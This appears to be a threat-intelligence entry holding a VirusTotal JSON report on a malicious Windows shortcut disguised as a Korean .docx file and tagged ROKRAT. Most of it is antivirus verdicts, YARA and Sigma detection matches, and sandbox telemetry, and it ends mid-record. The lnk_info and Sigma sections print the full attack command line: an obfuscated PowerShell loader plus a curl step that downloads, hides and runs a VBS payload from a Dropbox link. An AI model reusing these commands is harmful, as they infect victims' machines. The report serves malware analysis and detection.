ba8e682a72c6a3e634c070f0fb057bf5
Hash
- MD5: ba8e682a72c6a3e634c070f0fb057bf5
- SHA1: bd422dc1a133c3ac27fb4bfccb098eec3cf9f322
- SHA256: e49399502d455dbd38f1140bffa761701608526aefb7174646c2f8ffe881ae73
- First Seen: 2026-05-13
- Last Seen: 2026-05-13
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "e49399502d455dbd38f1140bffa761701608526aefb7174646c2f8ffe881ae73",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/e49399502d455dbd38f1140bffa761701608526aefb7174646c2f8ffe881ae73"
},
"attributes": {
"tlsh": "T179E39EA132F51457E9B1AEF4AEBCA3016CBB7122A130C54F0CCD5B0D9763A85C562F1E",
"last_submission_date": 1773806006,
"first_submission_date": 1773806006,
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"TROJAN",
"EVADER"
],
"sandbox_name": "Zenbox",
"malware_names": [
"ROKRAT"
],
"confidence": 100
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
},
"C2AE": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "C2AE",
"malware_names": [
"LnkMalicious"
],
"confidence": 80
}
},
"last_analysis_results": {
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.WinLNK.Pantera.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260605",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260605",
"category": "malicious",
"result": "lnk.trojan.pantera"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260604",
"category": "malicious",
"result": "Script.Trojan.50708.GC"
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260604",
"category": "malicious",
"result": "BehavesLike.Trojan.cx"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.Agent.LNK.Gen"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.238",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260601",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.55.59724",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.55.59722",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1221",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan Horse"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260605",
"category": "malicious",
"result": "LNK/Agent.AMP trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260605",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260605",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260605",
"category": "malicious",
"result": "HEUR:Trojan.Multi.Powecod.a"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260605",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.PSRunner/LNK!1.BADE (CLASSIC)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260604",
"category": "malicious",
"result": "Troj/LnkObf-AH"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.TR/LNK.Agent.EW"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260604",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5"
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260605",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14833",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan:Shortcut/SuspiciousLNK.SPCS!1"
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260605",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5 (B)"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44797AVA:64.31365",
"engine_update": "20260605",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1780642860",
"engine_update": "20260605",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260605",
"category": "malicious",
"result": "TR/LNK.Agent.EW"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.247.174",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38704",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260605",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5 [many]"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107315",
"engine_update": "20260604",
"category": "malicious",
"result": "Troj/LnkObf-AH"
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26040.8",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260605",
"category": "malicious",
"result": "LNK/ABlTrojan.XFWZ"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan/LNK.Agent.SC310378"
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-06-05.02",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260605",
"category": "malicious",
"result": "Win32.Trojan.Powecod.Qsmw"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260604",
"category": "malicious",
"result": "Trojan-JACI!BA8E682A72C6"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "2751a2f:2751a2f:52f3dc9:52f3dc9",
"engine_update": "20260604",
"category": "malicious",
"result": "TrojanDownloader/LNK.Starter.a"
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260605",
"category": "malicious",
"result": "LNK/Agent.CVT!tr"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan:Multi/Powecod.a"
},
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": null,
"engine_update": "20260605",
"category": "timeout",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260605",
"category": "timeout",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5615",
"engine_update": "20260604",
"category": "timeout",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": null,
"engine_update": "20260604",
"category": "timeout",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260605",
"category": "timeout",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260605",
"category": "failure",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.5.4.0",
"engine_update": "20260605",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260604-02",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.264",
"engine_update": "20260603",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.785",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
}
},
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PS_in_LNK",
"match_date": 1780648504,
"description": "Identifies PowerShell artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Execution_in_LNK",
"match_date": 1780648504,
"description": "Identifies execution artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Large_filesize_LNK",
"match_date": 1780648504,
"description": "Identifies shortcut (LNK) file larger than 100KB. Most goodware LNK files are smaller than 100KB.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "000a2489bd",
"ruleset_version": "000a2489bd|48401e01afaf50f369a7c99eab393389320c7380",
"ruleset_name": "expl_lnk_zdi_can_25373",
"rule_name": "EXT_EXPL_ZTH_LNK_EXPLOIT_A",
"match_date": 1780648504,
"description": "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373.",
"author": "Peter Girnus",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "01aaae7eed",
"ruleset_version": "01aaae7eed|834366aa118f4e231f6f835e1dd479dab29dc599",
"ruleset_name": "apt_reaper_malicious_lnk",
"rule_name": "apt_reaper_malicious_lnk",
"match_date": 1780648504,
"author": "Sekoia.io",
"source": "https://github.com/SEKOIA-IO/Community"
}
],
"unique_sources": 1,
"magic": "MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
"sha1": "bd422dc1a133c3ac27fb4bfccb098eec3cf9f322",
"meaningful_name": "\uc911\uad6d CMG \uc778\ud130\ubdf0.docx.lnk",
"sha256": "e49399502d455dbd38f1140bffa761701608526aefb7174646c2f8ffe881ae73",
"lnk_info": {
"modification_date": "1970-01-01T00:00:00Z",
"link_flags": [
"HasName",
"IsUnicode",
"HasExprString",
"HasArguments",
"PreferEnvironmentPath",
"HasIconLocation"
],
"command_line_arguments": " /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX:SFQMWnoXVVP.MKQ4epUkhW3nf6Yx]JI8N|gf\\[Ez]JI3\\Y{ve5QkeI{3]Z4zM}v;L38og|EWgKov]VP.MJ8ygJophW4K][TwT5kseJUMgJYwLF4T\\[UrLFU}gZ8n\\[njOYMo\\6Y|f5XjOX]seKUoflDtOp{xd6{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK4;Up<|UZImdF4S\\pso\\6U:MI;xUqYveH8keZY<iIQoeJYmgF4S\\pso\\6TjOX]sfqQ3LGH:SFQMWnoXVVP.MJ4yepwohW3nep<3dZ]8iWv;L3QSWXvmSlUydZz<MJ8ygJophV8}gZM}gKMsepfrPFznep<3dZ]8Op{oepg3dF33NWvng5o|]W4eX6o}gJYwOnoSOnMsepI|hYMo\\ZUofo39Rp8og|keX6o}gJYwOnoSOn]seJYgRmsyfJYxNFUxe6Us]qnvZ4Q8f6UoeV8MW|8JdZ{oWZ<n]Y39Rn<z]Z7vZ4Q8f6UoeV8MW|8JdZ{oTZQm][Q}[Wr9XpYk]F{eX6o}gJYwOnoSOn]seJYWdJI|]Y39RoMo\\ZTsNWv;L3oRVYUML}83fqo:MKgsfpXxTpI}]YQ3fpYkeV8W]ZYuNGE7PGDzPGIFQWjvZ4Q8f6UoeV8MW|8W]ZYuW6Ms]5ox[Wr9TpYqdZ7sR|U}ep<6SVU6d[MoOoMo\\ZUFh[Uof|jzhGD5RWf|NWw<]pox\\Z{vh[vng5o|]V8GeJ<}]VjsiWv;L3QSWXvmSlUleJImd}3zR|UmdJIsfm3zR|Ule5U8SVU}ep<6OpQygZ83R6grdZ{oLFjn\\p{k\\5vjOZ{3LFUle5U8N[vn\\5ksfKEofm3zhGL5R|Un\\[UoSVjn\\5ksfKEoflvn\\p{k\\5voPlnoPKj{PGD:MKQxe6geMJMv\\ZQu[W3nf58yg4vn\\p{k\\5wgLF4lhJ<|LFUn\\[UoR|UleJImd|vuiWv;L3QSWXvmSowWh[Q3]Z3xVX;xUpov]Y39Rog|d[UoTZ{vTqo3][PrMJ<seFznf58yg|n:SFQMWnoXVVP.dZ\\rMJQye[DjOZY{LGHsh|Ule5<uSVUydZ{<]Z{}][vn\\p<yd}3qOozqN|UydZ{<R|\\jMJMye5v:fpYwe6]oOZo3]Z3jO[EkgJjjMJ4yepwohVDw]p<|\\5X:SFQMWnoXVVP.';$key=3;for($i=0;$i -le $se.Length;$i++){$v+=[System.Text.Encoding]::ASCII.GetString($se[$i]-3)};$b = [System.Convert]::FromBase64String($v);$c = 
[System.Text.Encoding]::UTF8.GetString($b);$c;$sb = [scriptblock]::Create($c); & $sb;\"&cd /d \"%appdata%\\Microsoft\\MMC\" & copy c:\\windows\\system32\\curl.exe TMP0392.exe & TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7e&st=ip1rnvm2&dl=0\" &attrib +h taskschd.vbs &taskschd.vbs&exit\u001f\u0000",
"icon_location": ".DOCX",
"creation_date": "1970-01-01T00:00:00Z",
"header": {
"show_window": 7,
"file_size": 0,
"hot_key": "(0+0)",
"show_window_str": "SW_SHOWMINNOACTIVE"
},
"access_date": "1970-01-01T00:00:00Z"
},
"size": 155896,
"ssdeep": "768:OqC8AsQQYVgLG+Ypyvcg9c4xcRyeDj88u1XmYk:tzQQggLGPpyvcYKye388mmYk",
"type_tags": [
"windows",
"lnk"
],
"reputation": -1,
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "8d980d509aaf7ca8f2c6cd9dd23e8ea6eb18328ca64711cb6e059ecec024fe0a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Outbound Network Connection Initiated By Script Interpreter",
"rule_description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.",
"rule_author": "frack113, Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"DestinationIp": "185.199.110.133",
"Protocol": "tcp",
"SourceIp": "172.16.1.2",
"DestinationIsIpv6": "false",
"EventID": "3",
"SourcePort": "58971",
"Image": "C:\\Windows\\System32\\wscript.exe",
"Initiated": "true"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "80",
"DestinationIp": "104.18.20.213",
"Protocol": "tcp",
"SourceIp": "172.16.1.2",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\System32\\wscript.exe",
"SourcePort": "58973",
"Initiated": "true"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"DestinationIp": "185.199.110.133",
"Protocol": "tcp",
"SourceIp": "172.16.1.2",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"SourcePort": "59003",
"Initiated": "true"
}
}
]
},
{
"rule_level": "high",
"rule_id": "e6fdb32f143bba16a3ea06247ced55b7b90f8b5b5c6c26ddb95cdcf23908af8a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Command Line Obfuscation",
"rule_description": "Detects the PowerShell command lines with special characters",
"rule_author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)",
"match_context": [
{
"values": {
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
